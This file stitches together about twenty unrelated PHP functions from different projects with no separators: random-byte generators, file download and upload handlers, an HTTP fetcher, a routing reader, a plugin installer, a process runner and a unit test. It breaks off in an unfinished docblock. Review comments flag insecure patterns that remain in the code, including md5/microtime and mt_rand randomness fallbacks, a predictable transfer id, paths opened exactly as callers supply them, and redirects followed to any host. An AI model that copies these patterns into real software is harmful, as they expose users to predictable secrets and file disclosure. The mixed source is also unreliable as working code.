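/**
 * Return $count random bytes as a binary string.
 *
 * Sources are tried from strongest to weakest: random_bytes() when the
 * runtime provides it, OpenSSL (skipped on Windows, where the original
 * author found it slow), /dev/urandom, and finally an md5/microtime
 * generator seeded from $this->randomState.
 *
 * The md5/microtime fallback is NOT cryptographically secure: its state is
 * derived from the clock and the process id. It is kept only so that legacy
 * hosts without any OS randomness keep working.
 *
 * @param int $count Number of bytes wanted.
 * @return string Binary string of $count bytes.
 */
private function getRandomBytes($count)
{
    $bytes = '';

    // random_bytes() is the CSPRNG of PHP 7+. A failure there is allowed to
    // propagate instead of being silently downgraded to a weaker source.
    if ($count > 0 && function_exists('random_bytes')) {
        $bytes = random_bytes($count);
    }

    if ($bytes === '' && function_exists('openssl_random_pseudo_bytes')
        && strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') { // OpenSSL slow on Win
        $strong = false;
        $candidate = openssl_random_pseudo_bytes($count, $strong);
        // Accept the result only when OpenSSL reports a strong algorithm;
        // a false return used to skip /dev/urandom and fall to the weak path.
        if ($candidate !== false && $strong) {
            $bytes = $candidate;
        }
    }

    if (strlen($bytes) < $count && @is_readable('/dev/urandom')
        && ($hRand = @fopen('/dev/urandom', 'rb')) !== FALSE) {
        $read = fread($hRand, $count);
        fclose($hRand);
        $bytes = ($read === false) ? '' : $read;
    }

    if (strlen($bytes) < $count) {
        // Last resort, predictable generator (see the docblock).
        $bytes = '';
        if ($this->randomState === null) {
            $this->randomState = microtime();
            if (function_exists('getmypid')) {
                $this->randomState .= getmypid();
            }
        }
        for ($i = 0; $i < $count; $i += 16) {
            $this->randomState = md5(microtime() . $this->randomState);
            // version_compare() instead of a string comparison, which would
            // order '10' before '5'.
            if (version_compare(PHP_VERSION, '5', '>=')) {
                $bytes .= md5($this->randomState, true);
            } else {
                $bytes .= pack('H*', md5($this->randomState));
            }
        }
        $bytes = substr($bytes, 0, $count);
    }

    return $bytes;
}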
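/**
 * Collect the leading bytes of a candidate XLIFF document.
 *
 * Accepts the content, a file path, or both. When only a path is given the
 * first 1024 bytes are read from disk; when only content is given it is cut
 * to 1024 bytes. When a path is present its extension is checked through
 * self::isXliffExtension().
 *
 * @param string|null $stringData     Document content, if already loaded.
 * @param string|null $fullPathToFile Path of the document on disk.
 * @return array|false Single-element array holding the data, or false when
 *                     the extension check fails or no data is available.
 */
public static function isXliff($stringData = null, $fullPathToFile = null)
{
    self::_reset();
    $info = array();

    $hasData = !empty($stringData);
    $hasPath = !empty($fullPathToFile);

    if ($hasData && !$hasPath) {
        $stringData = substr($stringData, 0, 1024);
    } elseif (!$hasData && $hasPath) {
        $info = FilesStorage::pathinfo_fix($fullPathToFile);
        // Checking Requirements (By specs, I know that xliff version is in the first 1KB)
        $file_pointer = fopen($fullPathToFile, 'r');
        if ($file_pointer === false) {
            // An unreadable file is handled as "no data" instead of passing
            // false on to fread()/fclose().
            $stringData = '';
        } else {
            $stringData = fread($file_pointer, 1024);
            fclose($file_pointer);
        }
    } elseif ($hasData && $hasPath) {
        // we want to check extension and content
        // NOTE(review): in this branch the content is not truncated to 1 KB.
        $info = FilesStorage::pathinfo_fix($fullPathToFile);
    }

    self::$fileType['info'] = $info;

    // we want to check extension also if file path is specified
    if (!empty($info) && !self::isXliffExtension()) {
        // THIS IS NOT an xliff
        return false;
    }

    // preg_match( '|<xliff\s.*?version\s?=\s?["\'](.*?)["\'](.*?)>|si', $stringData, $tmp );
    if (!empty($stringData)) {
        return array($stringData);
    }

    return false;
}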
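/**
 * Stream a file from $path to the client as a download.
 *
 * The file name is converted from UTF-8 to GB2312 before it is joined to
 * $path, so that Chinese names resolve on the filesystem.
 *
 * NOTE(review): nothing visible here shows where $file_name comes from. If
 * it is request data, the caller must also pin $path to the intended
 * download directory; this method only rejects ".." segments and NUL bytes.
 *
 * @param string $path      Directory prefix, joined to the name as-is.
 * @param string $file_name UTF-8 file name relative to $path.
 * @return void
 */
protected function downFile($path, $file_name)
{
    header("Content-type:text/html;charset=utf-8");

    // Chinese file name compatibility
    $file_name = iconv("utf-8", "gb2312", $file_name);

    // Refuse names that climb out of $path or carry a NUL byte.
    if ($file_name === false
        || strpos($file_name, "\0") !== false
        || preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $file_name)) {
        echo '文件不存在';
        return;
    }

    // Site root by default; this can be replaced with a download directory
    $file_sub_path = $path;
    $file_path = $file_sub_path . $file_name;

    // Only regular files are served
    if (!is_file($file_path)) {
        echo '文件不存在';
        return;
    }

    // Binary mode so that no newline translation happens on Windows
    $fp = fopen($file_path, "rb");
    if ($fp === false) {
        echo '文件不存在';
        return;
    }
    $file_size = filesize($file_path);

    // Quotes and line breaks are stripped before the name enters a header
    $header_name = str_replace(array('"', "\r", "\n"), '', $file_name);

    // Headers required for a file download
    Header("Content-type: application/octet-stream");
    Header("Accept-Ranges: bytes");
    Header("Accept-Length:" . $file_size);
    Header("Content-Length: " . $file_size);
    Header('Content-Disposition: attachment; filename="' . $header_name . '"');

    $buffer = 1024;
    $file_count = 0;

    // Send the data to the browser, counting the bytes actually read
    while (!feof($fp) && $file_count < $file_size) {
        $file_con = fread($fp, $buffer);
        if ($file_con === false) {
            break;
        }
        $file_count += strlen($file_con);
        echo $file_con;
    }
    fclose($fp);
}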
/**
 * Read routing.prop and test its route blocks against $url.
 *
 * Nothing is done when self::$routes is already set. Otherwise the file
 * DOCUMENT_ROOT/Init/routing.prop is loaded, split on "\n" and scanned for
 * block start lines; each block's rows are parsed with
 * self::readRoutingRow() and handed to self::checkMe() until one call
 * returns a truthy value.
 *
 * @param string $url    URL passed through to self::checkMe().
 * @param array  $params Overwritten for every block that is read.
 * @return void
 */
public static function readRoutes($url, $params = array())
{
    if (isset(self::$routes)) {
    } else {
        $filename = $_SERVER["DOCUMENT_ROOT"] . "/Init/routing.prop";
        // NOTE(review): the fopen() result is not checked and the handle is
        // never closed in this method.
        $f = fopen($filename, "r");
        $r = fread($f, filesize($filename));
        $prop = explode("\n", $r);
        #print_r($prop);
        for ($i = 0; $i < count($prop); $i++) {
            // NOTE(review): a four-character prefix is compared with a
            // one-character literal here; the literal may have been four
            // spaces before whitespace was collapsed - confirm against the
            // original file.
            if (substr($prop[$i], 0, 4) != " ") {
                continue;
            }
            $params = array();
            $row = true;
            // Consume rows until readRoutingRow() returns a falsy value.
            // $i is advanced inside the loop with no bounds check, so a
            // block that runs to the end of the file indexes past $prop.
            while ($row) {
                $row = self::readRoutingRow($prop[$i++]);
                if ($row) {
                    $params[$row[0]] = $row[1];
                }
            }
            // Step back so that the for-loop increment lands on the line
            // after the one that ended the block.
            $i--;
            if (self::checkMe($url, $params)) {
                break;
            }
        }
    }
}
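/**
 * Return the size of a file as a float, including files larger than 4 GB
 * on builds where filesize() only yields the lower 32 bits.
 *
 * @param string $file Path of the file.
 * @return float|false Size in bytes, or false when the file cannot be
 *                     stat'ed or opened.
 */
function fsize($file)
{
    $fmod = filesize($file);
    if ($fmod === false) {
        return false;
    }

    // With 64-bit integers filesize() is already exact. The probing below
    // seeks by PHP_INT_MAX relative to the current position, which is only
    // meaningful where integers are 32 bits wide.
    if (PHP_INT_SIZE >= 8) {
        return (double) $fmod;
    }

    // filesize will only return the lower 32 bits of
    // the file's size! Make it unsigned.
    if ($fmod < 0) {
        $fmod += 2.0 * (PHP_INT_MAX + 1);
    }

    // find the upper 32 bits
    $i = 0;
    $myfile = fopen($file, "r");
    if ($myfile === false) {
        return false;
    }

    // feof has undefined behaviour for big files.
    // after we hit the eof with fseek,
    // fread may not be able to detect the eof,
    // but it also can't read bytes, so use it as an
    // indicator.
    while (strlen(fread($myfile, 1)) === 1) {
        fseek($myfile, PHP_INT_MAX, SEEK_CUR);
        $i++;
    }
    fclose($myfile);

    // $i is a multiplier for PHP_INT_MAX byte blocks.
    // return to the last multiple of 4, as filesize has modulo of 4 GB (lower 32 bits)
    if ($i % 2 == 1) {
        $i--;
    }

    // add the lower 32 bit to our PHP_INT_MAX multiplier
    return (double) $i * (PHP_INT_MAX + 1) + $fmod;
}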
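/**
 * Install the final_extract plugin.
 *
 * When $CONFIG['fex_enable'] is not set yet, the flag is inserted into the
 * config table and the statements of schema.sql and basic.sql (found in the
 * plugin directory) are executed, with the CPG_ placeholder replaced by the
 * configured table prefix.
 *
 * @return bool Always true.
 */
function final_extract_install()
{
    global $CONFIG, $lang_plugin_final_extract, $lang_plugin_final_extract_config, $thisplugin;

    require 'plugins/final_extract/configuration.php';
    require 'include/sql_parse.php';

    if (!isset($CONFIG['fex_enable'])) {
        $query = "INSERT INTO " . $CONFIG['TABLE_CONFIG'] . " VALUES ('fex_enable', '1');";
        cpg_db_query($query);

        // schema.sql creates the table, basic.sql puts the default settings
        foreach (array('/schema.sql', '/basic.sql') as $sql_file) {
            $db_schema = $thisplugin->fullpath . $sql_file;

            // file_get_contents() leaves no open handle behind, unlike the
            // previous fread(fopen(...)) pair.
            $sql_query = file_get_contents($db_schema);
            if ($sql_query === false) {
                trigger_error("final_extract: cannot read {$db_schema}", E_USER_WARNING);
                continue;
            }

            // Literal replacement: a prefix containing "$" or "\" must not
            // be interpreted as a regex back-reference.
            $sql_query = str_replace('CPG_', $CONFIG['TABLE_PREFIX'], $sql_query);
            $sql_query = remove_remarks($sql_query);
            $sql_query = split_sql_file($sql_query, ';');

            foreach ($sql_query as $q) {
                cpg_db_query($q);
            }
        }
    }

    return true;
}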
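/**
 * Read a whole local file into a string.
 *
 * @param string $p_diskfile Path of the file to read.
 * @return string|false File content ('' for an empty file), or false when
 *                      the file cannot be opened.
 */
function mci_file_read_local($p_diskfile)
{
    # Binary mode so the bytes are returned unchanged on every platform
    $t_handle = fopen($p_diskfile, "rb");
    if ($t_handle === false) {
        return false;
    }

    # stream_get_contents() also copes with empty files, where
    # fread( $handle, 0 ) is an error
    $t_content = stream_get_contents($t_handle);
    fclose($t_handle);

    return $t_content;
}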
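/**
 * Get the specified number of random bytes.
 *
 * Attempts to use a cryptographically secure (not predictable)
 * source of randomness if available. If there is no high-entropy
 * randomness source available, it will fail. As a last resort,
 * for non-critical systems, define
 * <code>Auth_OpenID_RAND_SOURCE</code> as <code>null</code>, and
 * the code will fall back on a pseudo-random number generator.
 *
 * When that fallback is selected and the runtime offers random_bytes(),
 * it is used instead of mt_rand(). A read from the configured source that
 * comes back short is reported as an error rather than returned as-is.
 *
 * @param int $num_bytes The length of the return value
 * @return string $bytes random bytes
 */
function getBytes($num_bytes)
{
    static $f = null;

    if ($num_bytes <= 0) {
        return '';
    }

    if ($f === null) {
        if (Auth_OpenID_RAND_SOURCE === null) {
            $f = false;
        } else {
            $f = @fopen(Auth_OpenID_RAND_SOURCE, "r");
            if ($f === false) {
                $msg = 'Define Auth_OpenID_RAND_SOURCE as null to ' . ' continue with an insecure random number generator.';
                // With the default handler this halts the script. A custom
                // handler that returns leaves $f === false, so later calls
                // take the fallback branch below.
                trigger_error($msg, E_USER_ERROR);
            }
        }
    }

    if ($f === false) {
        if (function_exists('random_bytes')) {
            return random_bytes($num_bytes);
        }

        // pseudorandom used: mt_rand() output is predictable and must not
        // back nonces or secrets on systems that matter
        $bytes = '';
        for ($i = 0; $i < $num_bytes; $i += 4) {
            $bytes .= pack('L', mt_rand());
        }
        return substr($bytes, 0, $num_bytes);
    }

    // fread() may return fewer bytes than requested; keep reading.
    $bytes = '';
    while (strlen($bytes) < $num_bytes) {
        $chunk = fread($f, $num_bytes - strlen($bytes));
        if ($chunk === false || $chunk === '') {
            break;
        }
        $bytes .= $chunk;
    }

    if (strlen($bytes) < $num_bytes) {
        trigger_error('Short read from Auth_OpenID_RAND_SOURCE.', E_USER_ERROR);
    }

    return $bytes;
}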
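/**
 * Fetch $this->_uri from $this->_host with a minimal HTTP/1.0 GET and return
 * the response body, following Location headers.
 *
 * NOTE(review): a Location header may name any host. If the initial URL or
 * the remote server is not trusted, the caller should restrict which hosts
 * and schemes may be contacted.
 *
 * @param int $max_redirects Remaining redirects to follow (default 5). Any
 *                           non-integer value is treated as the default.
 * @return string|false Body of the final response, the raw response when no
 *                      header/body separator is found, or false when the
 *                      request cannot be sent.
 */
function downloadToString($max_redirects = 5)
{
    if (!is_int($max_redirects)) {
        $max_redirects = 5;
    }

    $crlf = "\r\n";

    // A line break inside the URI or host would let the value add request
    // lines of its own.
    if (preg_match('/[\r\n]/', $this->_uri . $this->_host)) {
        return false;
    }

    // generate request
    $req = 'GET ' . $this->_uri . ' HTTP/1.0' . $crlf . 'Host: ' . $this->_host . $crlf . $crlf;

    // fetch
    $this->_fp = fsockopen(($this->_protocol == 'https' ? 'ssl://' : '') . $this->_host, $this->_port);
    if (!is_resource($this->_fp)) {
        return false;
    }
    fwrite($this->_fp, $req);

    // $response was previously appended to without being initialised
    $response = '';
    while (!feof($this->_fp)) {
        $chunk = fread($this->_fp, 1024);
        if ($chunk === false) {
            break;
        }
        $response .= $chunk;
    }
    fclose($this->_fp);

    // split header and body
    $pos = strpos($response, $crlf . $crlf);
    if ($pos === false) {
        return $response;
    }
    $header = substr($response, 0, $pos);
    $body = substr($response, $pos + 2 * strlen($crlf));

    // parse headers
    $headers = array();
    $lines = explode($crlf, $header);
    foreach ($lines as $line) {
        if (($pos = strpos($line, ':')) !== false) {
            $headers[strtolower(trim(substr($line, 0, $pos)))] = trim(substr($line, $pos + 1));
        }
    }

    // redirection? Bounded, so two servers redirecting to each other cannot
    // keep the request running forever.
    if (isset($headers['location']) && $max_redirects > 0) {
        $http = new ilHttpRequest($headers['location']);
        return $http->downloadToString($max_redirects - 1);
    }

    return $body;
}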
/**
 * The first 15 bytes read from the large file are all spaces.
 *
 * @test
 */
public function canReadFromLargeFile()
{
    $handle = fopen($this->largeFile->url(), 'rb');
    $firstBytes = fread($handle, 15);
    fclose($handle);

    $expected = str_repeat(' ', 15);
    $this->assertEquals($expected, $firstBytes);
}
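/**
 * Upload a profile picture for the group.
 *
 * The request body (php://input) is written to the content directory under
 * a generated name and the group's 'picture' field is pointed at it.
 *
 * The extension is supplied by the client and becomes part of a file name
 * inside a served directory, so it is matched against a short allow-list.
 * Without that check a script extension could be stored there.
 *
 * @param string $ext File extension without the dot.
 * @return void
 * @throws Exception When the user may not upload, the request is invalid or
 *                   the files cannot be opened.
 */
function save_picture($ext)
{
    global $cfg;

    if (!$this->user->logged_in() || !$this->user->group) {
        throw new Exception("Access denied!");
    }
    if (!isset($_SERVER["CONTENT_LENGTH"])) {
        throw new Exception("Invalid parameters");
    }

    // Image extensions only; extend the list to match what the site accepts.
    // NOTE(review): the content itself is still not verified to be an image,
    // and no upper bound on the upload size is enforced here.
    $ext = strtolower((string) $ext);
    if (!in_array($ext, array('jpg', 'jpeg', 'png', 'gif'), true)) {
        throw new Exception("Invalid parameters");
    }

    $size = (int) $_SERVER["CONTENT_LENGTH"];
    if ($size <= 0) {
        throw new Exception("Invalid parameters");
    }

    $file_name = rand() . time() . "{$this->user->id}.{$ext}";
    $file_path = "{$cfg['dir']['content']}{$file_name}";

    // Write the new one
    $input = fopen("php://input", "rb");
    $output = fopen($file_path, "wb");
    if (!$input || !$output) {
        if ($input) {
            fclose($input);
        }
        if ($output) {
            fclose($output);
        }
        throw new Exception("Cannot open files!");
    }

    // Count the bytes actually read; fread() may return less than asked
    // for, and the declared length is not proof of how much was sent.
    while ($size > 0 && !feof($input)) {
        $data = fread($input, $size > 1024 ? 1024 : $size);
        if ($data === false || $data === '') {
            break;
        }
        $size -= strlen($data);
        fwrite($output, $data);
    }
    fclose($input);
    fclose($output);

    // Update the profile image
    $this->group->update($this->user->group, array('picture' => $file_name));
}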
/**
 * Parse the 28-byte MZ header found at $info['avdataoffset'].
 *
 * The raw header fields and the sizes derived from them are stored under
 * $info['exe']['mz']. The method then records that EXE parsing is not
 * enabled and returns false, as it also does for a wrong signature.
 *
 * @return bool
 */
public function analyze()
{
    $info =& $this->getid3->info;

    fseek($this->getid3->fp, $info['avdataoffset'], SEEK_SET);
    $EXEheader = fread($this->getid3->fp, 28);

    $magic = 'MZ';
    if (substr($EXEheader, 0, 2) != $magic) {
        $info['error'][] = 'Expecting "' . Helper::PrintHexBytes($magic) . '" at offset ' . $info['avdataoffset'] . ', found "' . Helper::PrintHexBytes(substr($EXEheader, 0, 2)) . '"';
        return false;
    }

    $info['fileformat'] = 'exe';
    $info['exe']['mz']['magic'] = 'MZ';

    // field name => array(offset, length) inside the header, little-endian
    $layout = array(
        'last_page_size'          => array(2, 2),
        'page_count'              => array(4, 2),
        'relocation_count'        => array(6, 2),
        'header_paragraphs'       => array(8, 2),
        'min_memory_paragraphs'   => array(10, 2),
        'max_memory_paragraphs'   => array(12, 2),
        'initial_ss'              => array(14, 2),
        'initial_sp'              => array(16, 2),
        'checksum'                => array(18, 2),
        'cs_ip'                   => array(20, 4),
        'relocation_table_offset' => array(24, 2),
        'overlay_number'          => array(26, 2),
    );
    foreach ($layout as $field => $span) {
        $info['exe']['mz']['raw'][$field] = Helper::LittleEndian2Int(substr($EXEheader, $span[0], $span[1]));
    }

    $raw = $info['exe']['mz']['raw'];

    // Pages are 512 bytes and paragraphs 16 bytes in the arithmetic below
    $info['exe']['mz']['byte_size'] = ($raw['page_count'] - 1) * 512 + $raw['last_page_size'];
    $info['exe']['mz']['header_size'] = $raw['header_paragraphs'] * 16;
    $info['exe']['mz']['memory_minimum'] = $raw['min_memory_paragraphs'] * 16;
    $info['exe']['mz']['memory_recommended'] = $raw['max_memory_paragraphs'] * 16;

    $info['error'][] = 'EXE parsing not enabled in this version of GetId3Core() [' . $this->getid3->version() . ']';

    return false;
}
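/**
 * Write the content of a local file to the output.
 *
 * Only readable regular files are served; anything else produces no output.
 *
 * NOTE(review): the path is used as given. If it can be influenced by a
 * request, the caller must confine it to an allowed directory first.
 *
 * @param string $filename Path of the file to output.
 * @return void
 */
public static function echoFileContent($filename)
{
    if (!is_file($filename) || !is_readable($filename)) {
        return;
    }

    // readfile() streams the file instead of loading it into memory, and it
    // handles empty files, where fread() with a zero length is an error.
    readfile($filename);
}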
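/**
 * Read up to $size bytes from a file and escape them for a MySQL string
 * literal, using the connection returned by start_nchsls().
 *
 * NOTE(review): mysql_real_escape_string() belongs to the ext/mysql API,
 * which was removed in PHP 7, and its result is only safe inside a quoted
 * literal on that same connection. Bound parameters avoid both limits.
 *
 * @param string $file Path of the file to read.
 * @param int    $size Maximum number of bytes to read.
 * @return string|false Escaped data, or false when the file cannot be read.
 */
function file_to_str($file, $size)
{
    $link = start_nchsls();

    $fd = fopen($file, 'r');
    if ($fd === false) {
        return false;
    }

    // fread() rejects a zero length, so an empty request yields ''
    $str = ($size > 0) ? fread($fd, $size) : '';
    fclose($fd); // the handle used to stay open

    if ($str === false) {
        return false;
    }

    return mysql_real_escape_string($str, $link);
}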
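/**
 * Open an asynchronous connection to $host and register a persistent write
 * event on it: the first callback sends "GET /", later callbacks print what
 * has been received and close the socket at end of stream.
 *
 * The globals $index (per-socket state), $times (finished requests) and
 * $limit control when the event loop is asked to exit.
 *
 * @param string   $host    Address given to stream_socket_client(); it is
 *                          also placed in the Host header unchanged.
 * @param resource $base_fd Event base the new event is attached to.
 * @return void
 */
function httpGet($host, $base_fd)
{
    global $index;

    $fd = stream_socket_client("{$host}", $errno, $errstr, 3, STREAM_CLIENT_ASYNC_CONNECT | STREAM_CLIENT_CONNECT);
    if ($fd === false) {
        // Without this check a failed connect reached event_set() as false.
        // NOTE(review): a failed request is not counted in $times, so the
        // exit condition in the callback may need adjusting.
        trigger_error("httpGet: cannot connect to {$host}: {$errstr} ({$errno})", E_USER_WARNING);
        return;
    }

    // Explicit cast: a resource used as an array key is converted to its id
    $index[(int) $fd] = 0;

    $event_fd = event_new();
    event_set($event_fd, $fd, EV_WRITE | EV_PERSIST, function ($fd, $events, $arg) use ($host) {
        global $times, $limit, $index;

        if (!$index[(int) $fd]) {
            // First call: send the request
            $index[(int) $fd] = 1;
            $out = "GET / HTTP/1.1\r\n";
            $out .= "Host: {$host}\r\n";
            $out .= "Connection: Close\r\n\r\n";
            fwrite($fd, $out);
        } else {
            $str = fread($fd, 4096);
            echo $str, PHP_EOL;
            if (feof($fd)) {
                fclose($fd);
                $times++;
                echo "done\n";
                if ($times == $limit - 1) {
                    event_base_loopexit($arg[1]);
                }
            }
        }
    }, array($event_fd, $base_fd));
    event_base_set($event_fd, $base_fd);
    event_add($event_fd);
}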
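/**
 * Read document records from the index file that belongs to $name.
 *
 * Each record is read as three integers of
 * MULTIINDEX_DOCUMENTINTEGERBYTESIZE bytes. At most
 * MULTIINDEX_DOCUMENTRETURN records are returned.
 *
 * @param string $name Index name, resolved through _getFilePathName().
 * @return array List of array(int, int, int); empty when the file is missing.
 * @throws Exception When the file size is not a whole number of records,
 *                   the file cannot be opened or a record is truncated.
 */
public function getDocuments($name)
{
    $path = $this->_getFilePathName($name);
    if (!file_exists($path)) {
        return array();
    }

    // Size is checked before opening so no handle is left open on a throw
    $filesize = filesize($path);
    if ($filesize % MULTIINDEX_DOCUMENTBYTESIZE != 0) {
        throw new Exception('Filesize not correct index is corrupt!');
    }

    // Binary mode: the file holds packed integers
    $fp = fopen($path, 'rb');
    if ($fp === false) {
        throw new Exception('Cannot open index file');
    }

    $ret = array();
    $total = $filesize / MULTIINDEX_DOCUMENTBYTESIZE;
    for ($i = 0; $i < $total; $i++) {
        $record = array();
        for ($field = 0; $field < 3; $field++) {
            $bindata = fread($fp, MULTIINDEX_DOCUMENTINTEGERBYTESIZE);
            // A short read means the file changed or is damaged; unpack()
            // would fail on it and the record would be garbage.
            if ($bindata === false || strlen($bindata) < MULTIINDEX_DOCUMENTINTEGERBYTESIZE) {
                fclose($fp);
                throw new Exception('Filesize not correct index is corrupt!');
            }
            $data = unpack('i', $bindata);
            $record[] = $data[1];
        }
        $ret[] = $record;

        if (count($ret) == MULTIINDEX_DOCUMENTRETURN) {
            break;
        }
    }
    fclose($fp);

    return $ret;
}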
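/**
 * Compare a stream of block signatures with a local file.
 *
 * $input starts with a 16-bit big-endian block size followed by one raw
 * 16-byte MD5 per block. Blocks of $orgfile whose MD5 matches are stored in
 * the cache under prefix + block number; the numbers of the others are
 * returned as 'needed'.
 *
 * NOTE(review): the transfer id comes from mt_rand(), which is predictable.
 * If the id is the only thing that ties a later request to this transfer,
 * it should come from a CSPRNG.
 *
 * @param resource $orgfile Handle of the local file.
 * @param resource $input   Handle of the signature stream.
 * @return array array('transferid' => int, 'needed' => int[], 'count' => int)
 * @throws \InvalidArgumentException When the header is missing or declares a
 *                                   block size of zero.
 */
public function signature_split($orgfile, $input)
{
    $header = fread($input, 2);
    if ($header === false || strlen($header) < 2) {
        throw new \InvalidArgumentException('Signature stream has no block size header');
    }
    $info = unpack('n', $header);
    $blocksize = $info[1];

    // The block size is read from the stream. Zero would make every
    // fread() below invalid and the loop would never advance in $orgfile.
    if ($blocksize < 1) {
        throw new \InvalidArgumentException('Signature stream declares a block size of zero');
    }

    $this->info['transferid'] = mt_rand();
    $count = 0;
    $needed = array();
    $cache = $this->getCache();
    $prefix = $this->getPrefix();

    while (!feof($orgfile)) {
        $new_md5 = fread($input, 16);
        if (feof($input)) {
            break;
        }
        $data = fread($orgfile, $blocksize);
        $org_md5 = md5($data, true);

        // Strict comparison: "==" compares numeric-looking strings as numbers
        if ($org_md5 === $new_md5) {
            $cache->set($prefix . $count, $data);
        } else {
            $needed[] = $count;
        }
        $count++;
    }

    return array('transferid' => $this->info['transferid'], 'needed' => $needed, 'count' => $count);
}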
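/**
 * Send a file to the client. PDF files are sent as an attachment with their
 * own content type; everything else is sent as application/octet-stream.
 *
 * NOTE(review): $fullPath is opened as given. The caller is responsible for
 * limiting it to files the current user may read.
 *
 * @param string $fullPath Path of the file to send.
 * @return void
 */
public static function download($fullPath)
{
    $fd = fopen($fullPath, 'rb');
    if (!$fd) {
        // fclose() used to run on the failed handle as well
        return;
    }

    $fsize = filesize($fullPath);
    $path_parts = pathinfo($fullPath);

    // Files without an extension have no 'extension' key
    $ext = isset($path_parts['extension']) ? strtolower($path_parts['extension']) : '';

    // Quotes and line breaks must not reach the header value
    $name = str_replace(array('"', "\r", "\n"), '', $path_parts['basename']);

    switch ($ext) {
        case 'pdf':
            header('Content-type: application/pdf');
            // add here more headers for diff. extensions
            header('Content-Disposition: attachment; filename="' . $name . '"');
            // use 'attachment' to force a download
            break;
        default:
            header('Content-type: application/octet-stream');
            header('Content-Disposition: filename="' . $name . '"');
            break;
    }

    header("Content-length: {$fsize}");
    header('Cache-control: private');
    // use this to open files directly

    while (!feof($fd)) {
        $buffer = fread($fd, 2048);
        if ($buffer === false) {
            break;
        }
        echo $buffer;
    }
    fclose($fd);
}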
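/**
 * Handle the template import form.
 *
 * XML is taken from the text box when it holds text, otherwise from the
 * uploaded file. It is passed to import_xml_data(); any debug output is
 * kept in the session and the browser is sent back to templates_import.php.
 *
 * NOTE(review): the XML comes straight from the request. Whether
 * import_xml_data() parses it safely, and whether this form is protected
 * against cross-site requests, cannot be seen from this function.
 *
 * @return void
 */
function form_save()
{
    if (!isset($_POST["save_component_import"])) {
        return;
    }

    $import_text = isset($_POST["import_text"]) ? $_POST["import_text"] : "";
    $tmp_name = isset($_FILES["import_file"]["tmp_name"]) ? $_FILES["import_file"]["tmp_name"] : "";

    // trim() used to wrap the whole comparison, so it trimmed a boolean and
    // whitespace-only text was treated as real input.
    if (trim($import_text) != "") {
        /* textbox input */
        $xml_data = $import_text;
    } elseif ($tmp_name != "none" && $tmp_name != "" && is_uploaded_file($tmp_name)) {
        /* file upload; is_uploaded_file() confirms PHP stored the file itself */
        $xml_data = file_get_contents($tmp_name);
        if ($xml_data === false) {
            header("Location: templates_import.php");
            exit;
        }
    } else {
        header("Location: templates_import.php");
        exit;
    }

    if (isset($_POST["import_rra"]) && $_POST["import_rra"] == "1") {
        $import_custom_rra_settings = false;
    } else {
        $import_custom_rra_settings = true;
    }

    /* obtain debug information if it's set */
    $debug_data = import_xml_data($xml_data, $import_custom_rra_settings);
    if (sizeof($debug_data) > 0) {
        $_SESSION["import_debug_info"] = $debug_data;
    }

    header("Location: templates_import.php");
}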
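/**
 * Return an CT file for download.
 *
 * The file row is looked up by the id and filename request parameters, the
 * file is read from the files directory and sent with a content type chosen
 * by extension. The "type=download" parameter selects attachment instead of
 * inline disposition.
 *
 * NOTE(review): no permission check is visible in this function; confirm
 * that the caller verifies the user may read the requested file.
 */
function churchcore__filedownload()
{
    global $files_dir;

    include_once CHURCHCORE . "/churchcore_db.php";

    $mime_types = getMimeTypes();
    $file = db_query("select * from {cc_file} f where f.id=:id and filename=:filename", array(":id" => $_GET["id"], ":filename" => $_GET["filename"]))->fetch();

    // No matching row: the properties below used to be read from false
    if (!$file) {
        echo "Die Datei konnte nicht gefunden werden!";
        return;
    }

    $filename = "{$files_dir}/files/{$file->domain_type}/{$file->domain_id}/{$file->filename}";
    $handle = fopen($filename, "rb");
    if ($handle == false) {
        echo "Die Datei konnte nicht gefunden werden!";
        return;
    }

    // Also works for empty files, where fread() with length 0 is an error
    $contents = stream_get_contents($handle);
    fclose($handle);

    $ext = substr(strrchr($filename, '.'), 1);
    if (isset($mime_types[$ext])) {
        drupal_add_http_header('Content-Type', $mime_types[$ext], false);
    } else {
        drupal_add_http_header('Content-Type', 'application/unknown', false);
    }

    // The display name comes from the database; quotes and line breaks are
    // removed before it becomes part of a header value.
    $display_name = str_replace(array('"', "\r", "\n"), '', $file->bezeichnung);

    if (isset($_GET["type"]) && $_GET["type"] == "download") {
        drupal_add_http_header('Content-Disposition', 'attachment;filename="' . $display_name . '"', false);
    } else {
        drupal_add_http_header('Content-Disposition', 'inline;filename="' . $display_name . '"', false);
    }

    drupal_add_http_header('Cache-Control', 'must-revalidate, post-check=0, pre-check=0', false);
    drupal_add_http_header('Cache-Control', 'private', true);

    // The returned value is not used anywhere below
    $content = drupal_get_header();

    echo $contents;
}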
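/**
 * Run a command and capture its stdout, stderr and exit code.
 *
 * Both pipes are drained together with stream_select(). Reading stdout to
 * the end before touching stderr stalls when the child fills the stderr
 * pipe first, and polling non-blocking pipes in a tight loop burns CPU.
 *
 * $cmd is handed to the shell unchanged: any value that comes from outside
 * must be quoted with escapeshellarg() by the caller.
 *
 * @param string $cmd        Command line to run.
 * @param string $output     Receives everything written to stdout.
 * @param string $error      Receives everything written to stderr.
 * @param int    $returnCode Receives the value returned by proc_close().
 * @return void
 * @throws RuntimeException When the process cannot be started.
 */
function execute($cmd, &$output, &$error, &$returnCode)
{
    $descriptorspec = array(
        1 => array('pipe', 'w'),
        2 => array('pipe', 'w'),
    );

    $process = proc_open($cmd, $descriptorspec, $pipes);
    if (!is_resource($process)) {
        throw new RuntimeException("Unable to execute the command. [{$cmd}]");
    }

    stream_set_blocking($pipes[1], false);
    stream_set_blocking($pipes[2], false);

    $output = $error = '';
    $open = array(1 => $pipes[1], 2 => $pipes[2]);

    while ($open) {
        $read = array_values($open);
        $write = null;
        $except = null;

        // Sleep until one of the pipes has data or reaches end of stream
        if (stream_select($read, $write, $except, 1) === false) {
            break;
        }

        foreach ($read as $pipe) {
            $key = ($pipe === $pipes[1]) ? 1 : 2;

            $chunk = fread($pipe, 8192);
            if ($chunk !== false && $chunk !== '') {
                if (1 == $key) {
                    $output .= $chunk; // stdout
                } else {
                    $error .= $chunk; // stderr
                }
            }

            if (feof($pipe)) {
                fclose($pipe);
                unset($open[$key]);
            }
        }
    }

    // Only reached with open pipes when stream_select() failed
    foreach ($open as $pipe) {
        fclose($pipe);
    }

    $returnCode = proc_close($process);
}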
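/**
 * Convert an e-mail (and an optional cover file) to one PDF.
 *
 * The message is decoded, each part is turned into an intermediate file,
 * the 'gs' driver command combines them into a temporary PDF, and that PDF
 * is appended to $pdfout. Intermediate files are removed afterwards.
 *
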